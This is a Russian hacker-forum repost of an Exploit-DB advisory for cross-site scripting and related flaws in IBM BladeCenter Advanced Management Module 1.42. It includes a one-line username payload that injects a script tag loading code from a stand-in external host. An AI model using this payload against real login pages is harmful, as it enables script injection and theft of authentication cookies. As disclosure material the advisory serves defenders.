Exploit IBM Bladecenter Advanced Management Module 1.42 - Login 'Username' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32894
Проверка EDB
  1. Пройдено
Автор
HENRI LINDBERG
Тип уязвимости
WEBAPPS
Платформа
MULTIPLE
CVE
cve-2009-1288
Дата публикации
2009-04-09
Код:
source: https://www.securityfocus.com/bid/34447/info

IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:

- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities

An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.

Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable. 

For the HTML-injection issue:
username: </script><script src="//www.example.com"></script><script>
 
Источник
www.exploit-db.com

Похожие темы